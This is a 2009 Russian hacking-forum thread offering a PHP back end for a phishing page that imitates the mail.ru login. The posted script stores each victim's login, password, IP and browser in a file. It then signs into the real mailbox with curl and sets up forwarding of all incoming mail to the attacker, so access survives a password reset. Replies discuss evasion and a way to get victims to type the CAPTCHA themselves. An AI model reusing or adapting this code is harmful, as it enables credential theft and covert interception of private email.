Прячем "подарок" в ящике майла

Discussion in 'Уязвимости Mail-сервисов' started by Kusto, 31 Oct 2009.

  1. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Собственно говоря навеянно темой http://forum.antichat.ru/thread130561.html
    Сидим ты с товарищем zifanchuck - общаемся по аське и обалдеваем со скорости с которой товарищи с mail.ru латают дыры ну и собственно говоря чтоб они не остались без работы :D решили с ним написать простенький скрипт. Это собственно говоря часть фейка обычный файл с названием log.php
    Давайте порассуждаем как нам продлить свое незаметное прибывание на ящике жертвы? И что б вы сделали в первую очередь еслиб заподозрили что на вашем почтовом ящике "завелась какаято бяка"? Ответ напрашиваеться сам собой- бежим менять пасс и контрольный вопрос на восстановлении пароля- логично? (именно поэтому эту часть мы трогать небудем)
    Ну а чтож тогда остаеться в Нашем распоряжении??? Скажете- ничего? Типа жертва сменила пасс и вопрос- и мы доступ потеряли? Да так могут сказать 99% пользователей, но почемуто мы всегда без внимания оставляем маленькую деталь- а именно мы можем прописать СВОЕ мыло в ящике жертвы....(а вы когда последний раз залазили в своем ящике в пересылку писем?), Я думаю что уже почти все догадались что просто в нашем фейке- мы пропишем свое мыло на которое хотим получать всю входящую почту жертвы . Оригинальнось этого способа что при удачном стечении обстоятельств мы читаем письма жертвы а они у нее остаються в ящике непрочтенными, для этого надо лиш к своему фейку прикрутить обыкновенный файлик log.php который мы с товарищем Zifanchuk нарисовали специально для пользователей antichat.ru в котором единственное надо прописать свое мыло которое мы прячем в ящике жертвы, ну а после того как жертва авторизируеться- бежать на свой ящик и делать подтверждение на привязку своего ящика к ящику жертвы и тихо-тихо без палива читать все входящие которые получит наша жертва, а вот собственно говоря сам скрипт
    PHP:
    <?php
    /**
     * @author Kusto & Zifanchuck
     * @copyright 2009
     //Скрипт непретендует на оригинальность
     //Просто стараемся замаскироваться в ящике жертвы
     //был выложен на antichat.ru
     */
    $Login $_POST['login']; //Логин
    $Domain $_POST['domain']; 
    $Pass $_POST['password']; // Пароль
    $ip $_SERVER["REMOTE_ADDR"]; // IP Жертвы
    $Data date("d-m-y H:i:s"time()); // Дата и время
    $Browser getenv("HTTP_USER_AGENT");
    $Port getenv("REMOTE_PORT");
    $Connect $_SERVER['HTTP_CONNECTION'];
    $Host gethostbyaddr(getenv("REMOTE_ADDR")); 
    $Mymail='Наше мыло';//здесь записываем наше мыло на которое хотим получать письма с ящика жертвы в формате [email protected]
    $filelog fopen("base.php","a+"); //открываем файл базы
    $text "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:$Login@$Domain Пасс:$Pass";
    fwrite($filelog,"\n $text \n"); //записываем всё
    fclose($filelog); //закрываем

    function curl($url,$post)
    {
    $cfile 'cookies.txt';
    $ch curl_init();
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_URL$url);
    curl_setopt($chCURLOPT_HEADER0);
    curl_setopt($chCURLOPT_POSTFIELDS$post);
    curl_setopt($chCURLOPT_COOKIEJAR$cfile);
    curl_setopt($chCURLOPT_COOKIEFILE$cfile);
    curl_setopt($chCURLOPT_POST1);
    $result curl_exec($ch);
    curl_close($ch);
    return 
    $result;
    };



    $result curl('http://win.mail.ru/cgi-bin/auth''Login='.$Login.'&Domain='.$Domain.'&Password='.$Pass);
    $result curl('http://win.mail.ru/cgi-bin/modifyfwd''modify=1&Username='.$Login.'&Forward='.$Mymail.'&oldPswd='.$Pass);
    echo 
    "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://win.mail.ru/cgi-bin/auth?&Login=$Login&Domain=$Domain&Password=$Pass'></head></html>"// кидаем пользователя в ящик
    ?>
    P.S. Еще раз напоминаю что работа не авторская а результат бреда бвух балбесов которые мирно болтали в асе и их осенило (я имел ввиду себя и Zifanchuck)

    P.S. S.Пользуясь случаем хочу передать привет работникам mail.ru и пожелать процветания их компании втечении долгих долгих лет, с Уважением Кусто
     
    #1 Kusto, 31 Oct 2009
    Last edited: 31 Oct 2009
    12 people like this.
  2. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    В теме постите результаты тестов ну и ваши предложения. ждемс)
     
    1 person likes this.
  3. zavra

    zavra Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    87
    Likes Received:
    48
    Reputations:
    23
    нифига не понял. просто фейк, который настроит переадресацию?
     
  4. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Просто фейк который сохраняет мыло пасс в base.php
    так-же сохраняет куки в файл а Самое главное прячет ВАШЕ мыло в ящике жертвы впоследствии на которое вы получаете все входящие письма предназначенные для вашей жертвы (вернее копии писем)- это надо для того чтоб например у жертвы стоит высокая безопасность и вы неможете зайти на ящик либо тут-же сменила жертва и пасс и вопрос (чтоб контроль над ящиком непотерять)
     
  5. zavra

    zavra Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    87
    Likes Received:
    48
    Reputations:
    23
    ну ок, идея все же не нова. и человек, ставящий такие высокие настройки безопасности, вряд ли поведется на фейк.
     
  6. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    1.Я никогда невидел реализацию (ткните меня носом где вы это видели)
    2.За мою долгую практику (как можете видеть из этой темы http://forum.antichat.ru/thread57658.html) Высокую безопасность ставят именно ламеры, а на фейк как ты выразился.... просто ты видел наверное пабликфейки и делаеш выводы о всех (я иногда сам теряюсь: фейк передо мной или нет) :D ()))
     
  7. vano044

    vano044 New Member

    Joined:
    30 May 2009
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    А еще чего интересного засунуть в мыло изнутри, чтоб копнуть поглубже? Мыслей хороших не возникало?))))))
     
  8. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    тяжеловато будет кого на фейк закинуть, это вам не вконтакте.ру где можно пару букав изменить, а в мейл измени так сразу спалят )
     
  9. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки.....
     
    1 person likes this.
  10. Peklots

    Peklots Elder - Старейшина

    Joined:
    28 Sep 2008
    Messages:
    281
    Likes Received:
    144
    Reputations:
    36
    Один кернет нихера не понял :D
    Вот я закатал скрипт на локалхост,закатал туда-же base.php, дальше я так понимаю нужен фейк мылару?)
     
  11. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    Вот именно просто используеш эту страничку вместо существующей у тебя в фейке майла которую обычно обзывают log.php, однако на сегодняшний день как показал сатана-фу это вроде как неактуально, т к при входе они добавили запись что настроенна пересылка....и имя ящика


    Каптча я считаю вообще непроблемма- можно и контрольный вопросс менять и т д- просто каптчу надо вывести в тело письма и заставить жертву ее вводить самому (а что- так фейк даже убедительнее смотриться- майловская каптча в теле письма- которую майл просит ввести для того чтоб отличить спамбот пользуеться этим ящиком или человек :D )
     
    #11 Kusto, 22 Nov 2009
    Last edited: 22 Nov 2009
    1 person likes this.
  12. vano044

    vano044 New Member

    Joined:
    30 May 2009
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Где ты такое увидел??? 0_о я думал уже майл снова что то пофиксил- нифига- настроил пересылку на яндекс- все чисто- никаких записей по поводу пересылки.....


    Ето если со своего компа заходишь то нет палива а если поставить галочку чужой комп !!!!! или там проксю то мммммда паливо